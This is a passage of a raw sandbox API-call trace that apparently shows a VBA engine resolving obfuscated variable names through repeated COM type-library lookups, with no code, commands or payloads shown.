(This=0x665b4b0) returned 0x5 [0069.455] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="uAD4ADA", lHashVal=0x101bb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.455] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80cb6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uAD4ADA") returned 8 [0069.455] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uAD4ADA", lHashVal=0x101bb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.456] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf1b5b0, cb=0x20000*=0x78746341) returned 0xafdde80 [0069.457] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.457] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80cb6 | out: _Dst=0x67c2d40) returned 0x0 [0069.457] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_uAD4ADA") returned 0x100fb7 [0069.457] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_uAD4ADA" | out: _Dst="_B_var_uAD4ADA") returned 0x0 [0069.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_uAD4ADA") returned 15 [0069.457] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.457] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_uAD4ADA", lHashVal=0x100fb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.457] IUnknown:Release (This=0x665ba50) returned 0xd [0069.457] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.457] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_uAD4ADA", lHashVal=0x100fb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.457] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.457] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.457] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_uAD4ADA", lHashVal=0x100fb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.457] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.457] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.457] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_uAD4ADA", lHashVal=0x100fb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.457] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.457] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.457] IUnknown:Release (This=0x665ba50) returned 0xd [0069.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12d7e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_uAD4ADA") returned 15 [0069.458] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uAD4ADA", lHashVal=0x100fb7, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0) returned 0x0 [0069.458] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80cb6 | out: _Dst=0x144ec0) returned 0x0 [0069.458] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zBCAoA", lHashVal=0x10ad08, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zBCAoA") returned 7 [0069.458] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zBCAoA", lHashVal=0x10ad08, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zBCAoA") returned 7 [0069.458] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zBCAoA", lHashVal=0x10ad08, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.458] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zBCAoA") returned 0x10ad08 [0069.458] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zBCAoA" | out: _Dst="zBCAoA") returned 0x0 [0069.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zBCAoA") returned 7 [0069.458] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.458] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zBCAoA", lHashVal=0x10ad08, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.458] IUnknown:Release (This=0x665ba50) returned 0xd [0069.458] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.458] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zBCAoA", lHashVal=0x10ad08, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.458] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.458] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.458] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zBCAoA", lHashVal=0x10ad08, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.458] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.459] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.459] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zBCAoA", lHashVal=0x10ad08, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.459] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zBCAoA") returned 7 [0069.459] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zBCAoA", lHashVal=0x10ad08, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.459] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.459] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80c8e | out: _Dst=0x67c2d40) returned 0x0 [0069.459] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zBCAoA") returned 0x102772 [0069.459] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zBCAoA" | out: _Dst="_B_var_zBCAoA") returned 0x0 [0069.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zBCAoA") returned 14 [0069.459] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.459] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zBCAoA", lHashVal=0x102772, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.459] IUnknown:Release (This=0x665ba50) returned 0xd [0069.459] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.459] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zBCAoA", lHashVal=0x102772, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.459] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.459] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.459] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zBCAoA", lHashVal=0x102772, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.459] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.459] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.459] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zBCAoA", lHashVal=0x102772, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.459] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.459] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.459] IUnknown:Release (This=0x665ba50) returned 0xd [0069.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12dae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_zBCAoA") returned 14 [0069.459] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zBCAoA", lHashVal=0x102772, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0) returned 0x0 [0069.460] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80c8e | out: _Dst=0x144ec0) returned 0x0 [0069.460] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ooB4BQA", lHashVal=0x10be63, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d06, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ooB4BQA") returned 8 [0069.460] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ooB4BQA", lHashVal=0x10be63, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d06, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ooB4BQA") returned 8 [0069.460] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ooB4BQA", lHashVal=0x10be63, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.460] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ooB4BQA") returned 0x10be63 [0069.460] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="ooB4BQA" | out: _Dst="ooB4BQA") returned 0x0 [0069.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="ooB4BQA") returned 8 [0069.460] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.460] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ooB4BQA", lHashVal=0x10be63, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.460] IUnknown:Release (This=0x665ba50) returned 0xd [0069.460] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.460] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ooB4BQA", lHashVal=0x10be63, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.460] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.460] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.460] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ooB4BQA", lHashVal=0x10be63, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.460] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.460] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.460] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ooB4BQA", lHashVal=0x10be63, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.460] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d06, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ooB4BQA") returned 8 [0069.460] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ooB4BQA", lHashVal=0x10be63, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.461] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.461] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80d06 | out: _Dst=0x67c2d40) returned 0x0 [0069.461] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ooB4BQA") returned 0x10c1e7 [0069.461] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_ooB4BQA" | out: _Dst="_B_var_ooB4BQA") returned 0x0 [0069.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_ooB4BQA") returned 15 [0069.461] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.461] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ooB4BQA", lHashVal=0x10c1e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.461] IUnknown:Release (This=0x665ba50) returned 0xd [0069.461] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.461] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ooB4BQA", lHashVal=0x10c1e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.461] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.461] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.461] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ooB4BQA", lHashVal=0x10c1e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.461] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.461] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.461] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ooB4BQA", lHashVal=0x10c1e7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.461] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.461] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.461] IUnknown:Release (This=0x665ba50) returned 0xd [0069.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12dde, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_ooB4BQA") returned 15 [0069.461] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ooB4BQA", lHashVal=0x10c1e7, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x42003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x42003400000000, pDummy=0x0) returned 0x0 [0069.461] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80d06 | out: _Dst=0x144ec0) returned 0x0 [0069.461] ITypeComp:RemoteBind (in: This=0x665ba60, szName="r_xUDAU4", lHashVal=0x107f06, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d2e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="r_xUDAU4") returned 9 [0069.462] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="r_xUDAU4", lHashVal=0x107f06, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d2e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="r_xUDAU4") returned 9 [0069.462] ITypeComp:RemoteBind (in: This=0x665bd30, szName="r_xUDAU4", lHashVal=0x107f06, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="r_xUDAU4") returned 0x107f06 [0069.462] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="r_xUDAU4" | out: _Dst="r_xUDAU4") returned 0x0 [0069.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="r_xUDAU4") returned 9 [0069.462] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.462] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="r_xUDAU4", lHashVal=0x107f06, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.462] IUnknown:Release (This=0x665ba50) returned 0xd [0069.462] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.462] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="r_xUDAU4", lHashVal=0x107f06, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.462] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.462] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.462] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="r_xUDAU4", lHashVal=0x107f06, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.462] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.462] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.462] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="r_xUDAU4", lHashVal=0x107f06, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.462] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d2e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="r_xUDAU4") returned 9 [0069.462] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="r_xUDAU4", lHashVal=0x107f06, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.462] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.462] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80d2e | out: _Dst=0x67c2d40) returned 0x0 [0069.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_r_xUDAU4") returned 0x10568f [0069.463] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_r_xUDAU4" | out: _Dst="_B_var_r_xUDAU4") returned 0x0 [0069.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_r_xUDAU4") returned 16 [0069.463] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.463] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_r_xUDAU4", lHashVal=0x10568f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.463] IUnknown:Release (This=0x665ba50) returned 0xd [0069.463] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.463] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_r_xUDAU4", lHashVal=0x10568f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.463] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.463] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.463] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_r_xUDAU4", lHashVal=0x10568f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.463] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.463] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.463] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_r_xUDAU4", lHashVal=0x10568f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.463] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.463] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.463] IUnknown:Release (This=0x665ba50) returned 0xd [0069.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12e0e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_r_xUDAU4") returned 16 [0069.463] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_r_xUDAU4", lHashVal=0x10568f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x44005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x44005500000000, pDummy=0x0) returned 0x0 [0069.463] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80d2e | out: _Dst=0x144ec0) returned 0x0 [0069.463] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HACA_C", lHashVal=0x1084ff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d5a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HACA_C") returned 7 [0069.463] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HACA_C", lHashVal=0x1084ff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80d5a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HACA_C") returned 7 [0069.464] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HACA_C", lHashVal=0x1084ff, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, 